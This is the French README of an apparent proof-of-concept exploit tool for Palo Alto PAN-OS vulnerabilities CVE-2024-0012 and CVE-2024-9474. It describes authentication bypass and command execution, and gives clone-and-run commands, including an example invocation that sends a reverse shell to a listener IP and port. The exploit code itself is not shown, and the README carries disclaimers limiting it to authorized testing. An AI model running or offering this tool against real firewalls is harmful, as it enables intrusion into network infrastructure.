
Cette preuve de concept (PoC) cible des vulnérabilités dans Palo Alto PAN-OS, plus précisément CVE-2024-0012 et CVE-2024-9474. Ce script automatise le processus d'exploitation, incluant la création de charges utiles, la livraison par fragments et l'exécution fluide de commandes.
Ce script de preuve de concept (PoC) cible les vulnérabilités de Palo Alto PAN-OS, spécifiquement CVE-2024-0012 et CVE-2024-9474 en automatisant le processus d'exploitation, y compris le contournement de l'authentification, la création de la charge utile, la livraison par fragments et l'exécution transparente de commandes.
⚠️ Ce script est destiné uniquement à des fins éducatives et de tests de pénétration autorisés. Toute utilisation non autorisée est illégale.
git clone https://github.com/TalatumLabs/CVE-2024-0012_CVE-2024-9474_PoC.git
cd CVE-2024-0012_CVE-2024-9474_PoC
python -W ignore poc.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>
<TARGET_URL>: L'URL cible, incluant http ou https.<LISTENER_IP>: Votre adresse IP pour l'écouteur de reverse shell.<LISTENER_PORT>: Le port pour l'écouteur de reverse shell.python -W ignore poc.py https://target.pan-os-system.com 192.168.1.100 4444
https://github.com/user-attachments/assets/12ca7632-e5d2-488f-b644-6e278651a2f5
Obtenez l'analyse complète et les informations techniques sur ce PoC à partir de cet article Medium !
Ce PoC est destiné uniquement à des fins éducatives et tests de sécurité autorisés. Toute utilisation non autorisée de cet outil est strictement interdite. Les auteurs ne sont pas responsables de toute utilisation abusive ou des dommages causés par cet outil.